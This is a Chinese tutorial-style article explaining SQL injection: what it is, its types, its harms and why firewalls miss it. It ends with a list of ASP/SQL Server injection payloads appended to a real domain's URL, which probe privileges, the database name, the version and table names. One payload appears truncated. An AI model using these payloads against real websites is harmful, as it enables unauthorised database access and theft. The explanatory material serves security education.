1、什么是sql注入 

    随着b/s模式应用开发的发展，使得使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高，程序员的水平及经验也参差不齐，相当大一部分程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。攻击者可以通过互联网的输入区域，利用某些特殊构造的sql语句插入sql的特殊字符和指令，提交一段数据库查询代码（一般是在浏览器地址栏进行，通过正常的www端口访问），操纵执行后端的dbms查询并获得本不为用户所知数据的技术，也就是sql injection（sql注入）。

    sql注入是从正常的www端口通过对页面请求访问，而且表面看起来跟一般的web页面访问没什么区别，所以目前市面的防火墙很少会对sql注入发出警报，如果管理员没查看iis日志的习惯，可能被入侵很长时间都不会发觉。

    sql注入的手法相当灵活，可以根据具体情况进行分析，构造巧妙的sql语句，从而获取想要的数据。

    程序存在sql注入，追其原因，是因为代码或者编码的不完善。但说到底，是程序员的惰性。代码的不完善，往往是因为在程序编写的过程中，没有考虑到代码的健壮性及安全性的结果，就国内现状来看，大多数网站使用的脚本语言，用asp+access或sqlserver的占70%以上，php+mysql占20%，其他的不足10%，并且因为开发者水平的参差不齐,代码编写的过程考虑不够周全，程序代码的安全性值得怀疑，而程序脚本被注入也成为必然。

    当然，程序运行环境的先天缺陷也是人为的，这种现象无法完全杜绝避免。从攻击者的角度来看，使用sql注入能够避免绝大多数防火墙的防御，不留攻击痕迹，攻击手法多种多样，因此才会导致sql注入攻击手段的兴起。

2、sql注入的原理及分类

    sql-injection的原理

    sql是一种用于关系数据库的结构化查询语言。它分为许多种，但大多数都松散地基于美国国家标准化组织最新的标准sql-92。sql语言可以修改数据库结构和操作数据库内容。当一个攻击者能够通过往查询中插入一系列的sql操作数据写入到应用程序中去，并对数据库实施了查询，这时就已经构成了sql-injection。

    sql-injection的分类

    由于sql-injection攻击出要发生在b/s结构的应用程序上，而这些程序大部分都属于互联网的web站点，在这种情况下sql-injection同样需要遵循http协议，形成了两种分类： post方式注入和get方式注入

3、sql-injection的攻击方法

    常规注入方法 sql注入攻击本身就是一个常规性的攻击，它可以允许一些不法用户检索你的数据，改变服务器的设置，或者在你不小心的时候黑掉你的服务器。

    旁注 顾名思义就是从旁注入，也就是利用主机上面的一个虚拟站点进行渗透 ，此类手法多出现与虚拟主机站点。

    盲注 通过构造特殊的sql语句，在没有返回错误信息的情况下进行注入。

    跨站注入 攻击者利用程序对用户输入过滤及判断的不足，写入或插入可以显示在页面上对其他用户造成影响的代码。跨站注入的高级攻击就属于这种攻击。

4、sql注入的危害

    sql注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户，从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序，对网站的正常运营和访问该网站的网友都带来巨大危害。

5、sql注入漏洞的风险

    由于sql注入是从正常的www端口访问，而且表面看起来跟一般的web页面访问没什么区别，所以目前市面的防火墙都不会对sql注入发出警报，如果管理员没查看iis日志的习惯，可能被入侵很长时间都不会发觉。它能够直接在数据库中添加具有管理员权限的用户，从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序，对网站和访问该网站的网友都带来巨大危害。

    无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制，如果你的网络应用程序开发者没有遵循安全代码进行开发，攻击者将通过80端口进入你的系统。

    例如，如果一个网站的数据库系统为sql server 2000数据库，同时没有在数据库的权限设置上做好安全限制，将导致严重的后果。sql注入意味着数据库也会被攻破，入侵者得到当前数据库权限的同时，也获得了整个数据库服务器的管理权限，入侵者可通过数据库管理权限得到系统权限，并为所欲为。

    再者，很多网站的管理后台都可经由公网直接访问到后台管理登录页面，并且可通过暴力猜解等方式对后台管理账户进行猜解。对于任何一个网站的后台管理登录页，安全的做法应该是限制访问。尤其是对于政府及银行网络来说，更不应该将后台管理页面放置到公网上任由访问，这样的话安全系数会大大减少，遭受攻击的机会却大大增加了。

6、sql注入之asp注入常用语句

是否支持多句查询
http://www.baidu.com @a int--

是否支持子查询
http://www.baidu.com and (select count(1) from [sysobjects])>=0

返回用户名
http://www.baidu.com and user%2bchar(124)=0

当前用户是否为 sysadmin 固定服务器角色的成员。
http://www.baidu.com and cast(is_srvrolemember(0x730079007300610064006d0069006e00) as varchar(1))%2bchar(124)=1

ps:0x730079007300610064006d0069006e00 = sysadmin

当前用户是否为 db_owner 固定数据库角色的成员
http://www.baidu.com and cast(is_member(0x640062005f006f0077006e0065007200) as varchar(1))%2bchar(124)=1

0x640062005f006f0077006e0065007200 = db_owner

返回数据库名
http://www.baidu.com and db_name()%2bchar(124)=0

操作系统和sqlserver版本
http://www.baidu.com and @@version = 1

本地服务器名称
http://www.baidu.com and @@servername = 1

http://www.baidu.com  and (select top 1 cast(name as varchar(8000)) from(select top 1 id,name from sysobjects where xtype=char(85) order by id) t order by id desc)>0 --第一个表名